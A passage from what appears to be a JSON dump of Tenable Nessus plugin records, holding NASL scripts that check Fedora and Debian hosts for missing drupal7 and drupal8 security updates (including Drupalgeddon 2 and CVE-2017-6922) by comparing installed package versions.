preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-906ba26b4d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal8 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"drupal8-8.4.6-3.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:19:34", "description": "-\n [8.3.9](https://www.drupal.org/project/drupal/releases/8\n .3.9)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.3.8](https://www.drupal.org/project/drupal/releases/8\n .3.8)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 25, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-24T00:00:00", "title": "Fedora 26 : drupal8 (2018-922cc2fbaa) (Drupalgeddon 2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6930", "CVE-2017-6927"], "modified": "2018-04-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-922CC2FBAA.NASL", "href": "https://www.tenable.com/plugins/nessus/109288", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-922cc2fbaa.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109288);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2018-7600\");\n script_xref(name:\"FEDORA\", value:\"2018-922cc2fbaa\");\n\n script_name(english:\"Fedora 26 : drupal8 (2018-922cc2fbaa) (Drupalgeddon 2)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"-\n [8.3.9](https://www.drupal.org/project/drupal/releases/8\n .3.9)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.3.8](https://www.drupal.org/project/drupal/releases/8\n .3.8)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-922cc2fbaa\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/SA-CORE-2018-001\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal8 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"drupal8-8.3.9-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:14:17", "description": "-\n [7.56](https://www.drupal.org/project/drupal/releases/7.\n 56)\n\n -\n [SA-CORE-2017-003](https://www.drupal.org/SA-CORE-2017-0\n 03)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-07-05T00:00:00", "title": "Fedora 24 : drupal7 (2017-e8a2017b3c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6922"], "modified": "2017-07-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-E8A2017B3C.NASL", "href": "https://www.tenable.com/plugins/nessus/101216", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-e8a2017b3c.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101216);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-6922\");\n script_xref(name:\"FEDORA\", value:\"2017-e8a2017b3c\");\n\n script_name(english:\"Fedora 24 : drupal7 (2017-e8a2017b3c)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"-\n [7.56](https://www.drupal.org/project/drupal/releases/7.\n 56)\n\n -\n [SA-CORE-2017-003](https://www.drupal.org/SA-CORE-2017-0\n 03)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-e8a2017b3c\"\n );\n # https://www.drupal.org/SA-CORE-2017-003\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?34ea2f5d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"drupal7-7.56-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:11:28", "description": "-\n [7.56](https://www.drupal.org/project/drupal/releases/7.\n 56)\n\n -\n [SA-CORE-2017-003](https://www.drupal.org/SA-CORE-2017-0\n 03)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-07-17T00:00:00", "title": "Fedora 26 : drupal7 (2017-6874606e19)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6922"], "modified": "2017-07-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-6874606E19.NASL", "href": "https://www.tenable.com/plugins/nessus/101649", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-6874606e19.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101649);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-6922\");\n script_xref(name:\"FEDORA\", value:\"2017-6874606e19\");\n\n script_name(english:\"Fedora 26 : drupal7 (2017-6874606e19)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"-\n [7.56](https://www.drupal.org/project/drupal/releases/7.\n 56)\n\n -\n [SA-CORE-2017-003](https://www.drupal.org/SA-CORE-2017-0\n 03)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-6874606e19\"\n );\n # https://www.drupal.org/SA-CORE-2017-003\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?34ea2f5d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"drupal7-7.56-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T09:38:24", "description": "Private files that have been uploaded by an anonymous user but not\npermanently attached to content on the site should only be visible to\nthe anonymous user that uploaded them, rather than all anonymous\nusers. Drupal core did not previously provide this protection,\nallowing an access bypass vulnerability to occur. This issue is\nmitigated by the fact that in order to be affected, the site must\nallow anonymous users to upload files into a private file system. \n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u16.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 20, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-06-29T00:00:00", "title": "Debian DLA-1004-1 : drupal7 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6922"], "modified": "2017-06-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1004.NASL", "href": "https://www.tenable.com/plugins/nessus/101092", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1004-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101092);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-6922\");\n\n script_name(english:\"Debian DLA-1004-1 : drupal7 security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Private files that have been uploaded by an anonymous user but not\npermanently attached to content on the site should only be visible to\nthe anonymous user that uploaded them, rather than all anonymous\nusers. Drupal core did not previously provide this protection,\nallowing an access bypass vulnerability to occur. This issue is\nmitigated by the fact that in order to be affected, the site must\nallow anonymous users to upload files into a private file system. \n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u16.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/06/msg00034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/drupal7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"drupal7\", reference:\"7.14-2+deb7u16\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:15:52", "description": "-\n [7.56](https://www.drupal.org/project/drupal/releases/7.\n 56)\n\n -\n [SA-CORE-2017-003](https://www.drupal.org/SA-CORE-2017-0\n 03)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-07-05T00:00:00", "title": "Fedora 25 : drupal7 (2017-38113758e7)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6922"], "modified": "2017-07-05T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:25", "p-cpe:/a:fedoraproject:fedora:drupal7"], "id": "FEDORA_2017-38113758E7.NASL", "href": "https://www.tenable.com/plugins/nessus/101212", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-38113758e7.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101212);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-6922\");\n script_xref(name:\"FEDORA\", value:\"2017-38113758e7\");\n\n script_name(english:\"Fedora 25 : drupal7 (2017-38113758e7)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"-\n [7.56](https://www.drupal.org/project/drupal/releases/7.\n 56)\n\n -\n [SA-CORE-2017-003](https://www.drupal.org/SA-CORE-2017-0\n 03)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-38113758e7\"\n );\n # https://www.drupal.org/SA-CORE-2017-003\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?34ea2f5d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/05\");\n 